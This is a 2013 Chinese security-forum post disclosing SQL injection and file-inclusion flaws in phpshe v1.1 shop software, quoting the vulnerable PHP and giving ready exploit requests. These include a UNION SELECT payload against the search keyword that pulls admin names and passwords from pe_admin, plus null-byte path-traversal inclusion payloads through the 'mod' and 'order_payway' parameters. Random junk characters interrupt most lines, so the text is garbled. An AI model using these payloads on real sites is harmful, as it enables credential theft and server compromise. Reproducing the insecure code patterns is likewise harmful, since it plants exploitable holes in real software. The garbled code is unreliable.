中国网络渗透测试联盟

标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell [打印本页]

作者: admin    时间: 2013-4-19 19:01
标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell
/*******************************************************/
8 A9 @1 @% Q$ S8 B0 V+ G1 V, w/* Phpshe v1.1 Vulnerability8 W0 `8 I! K$ Q7 }# q+ e
/* ========================
6 y3 p" r* f. F4 S/* By: : Kn1f3
+ Y; B. @3 x4 F9 ^' K/* E-Mail : 681796@qq.com
) t2 C  A$ a: a; l4 Y$ p/*******************************************************/- n6 _( `6 r+ r: \& ~
0×00 整体大概参数传输2 u, j0 q+ s% m  J* _. f

) i( {3 \" d% a5 w) k6 \
; i  U/ t3 k' d3 `# p5 Q

) N' ~$ Z6 [& y7 G& @//common.php
* W! f8 t# L, l4 ~% v; B" oif (get_magic_quotes_gpc()) {( ^* l0 ~- m. L1 V" p% ^& n
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');2 F0 @  t6 D3 ^6 o! q/ `( B* V
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
! u+ B! Y  r3 y% ~/ F8 @  B}
& N# ?% K0 V, P$ @0 W- G7 ~else {- B" t1 a  K7 G# E3 k; j
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');6 M1 [+ f; i7 F# R! a  @8 q
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
% Q" B: k3 U+ F}
/ n, E# i  t7 d4 e0 y2 Jsession_start();6 x3 A* X% d8 j: D2 Y4 p& h) e, o
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');4 Z2 s) d& C6 O7 A6 Y7 {" v
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');% [# T! H( n2 j8 _/ d
3 U0 z9 {$ R) D7 y% Y
0×01 包含漏洞
" p, G( g5 `0 b0 n6 |# m% c! x/ f( z3 q 9 x( n3 R$ S" u3 b
' t  L, w2 _; n. T
//首页文件
; v7 ~% A  g% L  H1 j0 r<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
7 ?4 T% u6 X! X" i: f% U8 Finclude("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞$ v! a1 p% q, e! T
pe_result();1 A; q3 }; T( F
?>3 A) q% p0 E8 M0 s" K
//common 文件 第15行开始
3 x; Z8 ~! O. b4 C! V( Purl路由配置
2 k, a% \0 w0 N6 x$module = $mod = $act = 'index';
; S9 K" v9 x0 F$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);& u( r  b/ k% i2 o5 K( P- E& W
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);2 j3 ?( y. e2 _% K( c+ i- a0 R
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
: H' s$ J0 w% A3 U) O8 D//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
. V/ g- \  b1 A6 i" T. k


9 y! Z# I. g9 A/ K: Q0 U 2 s: s( u9 I7 q/ ]8 ~* d: u1 ?( I
0×02 搜索注入$ c& D4 M' h2 n. T
9 K' b& y& r# O& Z2 r! F6 r1 l
<code id="code2">

//product.php文件0 I- E8 P# ], Y# C
case 'list':
# V' a% o) H8 ]7 v0 p  P$category_id = intval($id);9 i" j) @/ r) d5 F7 [4 J
$info = $db->pe_select('category', array('category_id'=>$category_id));, }6 S* G/ A) f3 t1 f/ t6 k: u
//搜索  n- _9 o% U1 d7 b
$sqlwhere = " and `product_state` = 1";
" @8 k4 h" v0 k, zpe_lead('hook/category.hook.php');
( s( e3 m! J. G8 Y$ j9 iif ($category_id) {
, g6 t& h9 z  E  d1 J9 xwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
0 O8 j& g. }7 O& J) z}
. _1 E* P* p8 J$ J" S# q$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤* L; q8 Z5 v% @
if ($_g_orderby) {
9 Z% e3 L; O- V/ q$orderby = explode('_', $_g_orderby);
8 d9 F* P' q* _( ^$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";0 b. s) l9 u2 H' O
}
3 [+ b# [9 {1 _6 j1 k) g* _else {
5 X2 \9 n0 z4 q' O! J" K, T! M$sqlwhere .= " order by `product_id` desc";
+ b! U6 E7 V+ ^  K% ^}3 y" r/ U7 K' p8 l+ b: h1 p
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
1 z' F4 L( {; A! x9 V& |//热卖排行
  g+ f6 J; K9 K1 J: f3 R% q) m$product_hotlist = product_hotlist();
# n' ]3 u# S- Y4 h( N+ {) ~//当前路径
1 B7 X/ L  h( V- P$ t8 j2 L$nowpath = category_path($category_id);. g( [1 l: ~9 Z* c- \) `' R
$seo = pe_seo($info['category_name']);
0 J! k/ H0 J5 pinclude(pe_tpl('product_list.html'));
% D0 J5 \) v5 u- v8 s//跟进selectall函数库
- m1 q1 ~0 C) Y! P( dpublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
0 {/ ?2 a5 N; a5 W' D{
# [8 c( g# g6 y" s; F: G! D  z//处理条件语句- I4 E3 n" }+ e- L
$sqlwhere = $this->_dowhere($where);% z, c. W5 V& [
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);% `% G8 H5 n" Q3 M, D+ Z
}
* i7 E2 Y) w+ j& }//exp
' H4 p- Z0 Y8 v4 s  g! ^  _product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1* n7 V7 Z* ?! k8 {! e8 T/ h0 B

</code>
2 C1 ~' t" n7 T
1 x3 j7 Y7 I2 O  {0×03 包含漏洞2) G9 @" a- [# h  N7 |
/ M/ E# ?! Y% t( k" R8 Z  V9 [/ z% f8 p
<code id="code3">

//order.php

case 'pay':

: z% h. D: T% n: \
$order_id = pe_dbhold($_g_id);


; X/ E8 u9 g6 u) f2 C* N: l$cache_payway = cache::get('payway');

3 n* O7 K8 t) d( G" U8 q
foreach($cache_payway as $k => $v) {


# c! Y7 @6 J9 E6 k- c* h$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

  g  T7 y" q: L# }/ c
if ($k == 'bank') {

0 A9 p) i2 i) M
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

. n7 M4 ~" L) i
}


# ?1 Q$ W1 w: J2 l. n) W  T& G$ x}


# U# x! k* [* J8 J% m" }8 l$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


4 D, a0 s5 m, G! W. l5 A!$order['order_id'] && pe_error('订单号错误...');

) y  b4 X0 |. c: q; Q
if (isset($_p_pesubmit)) {


' l" N6 r- A% u$ kif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

' W% b0 g* `7 I0 @/ O0 F9 V
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

7 E, a' J0 }; f& q: U
foreach ($info_list as $v) {


2 Z. e' ?/ _( j8 Y5 B% j' s$order['order_name'] .= "{$v['product_name']};";' O* [* k7 Q6 o

6 L2 ]$ D) V4 P) H; c; d
}

4 n/ M. Y9 x) O, X" m. N9 p
echo '正在为您连接支付网站,请稍后...';

$ D; ~" {6 o0 I' M3 U
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


) e5 Q, n. Q6 T. j6 `, e. c}//当一切准备好的时候就可以进行"鸡肋包含了"


+ X) G4 M% r- belse {

% L  K6 t1 ^5 u! H2 b% n
pe_error('支付错误...');

( J( u5 ?* q" ]- V/ L( s
}

  i8 G- k8 D" D  D6 \( r
}


7 v6 x* i& _; `3 K: l) D: }$seo = pe_seo('选择支付方式');


* M% v& l& L4 v, l* v& U% n8 Pinclude(pe_tpl('order_pay.html'));


9 \0 W$ b6 i9 Xbreak;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
8 [, W8 U2 [/ P' ~* |6 V  p* ?( v5 K




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2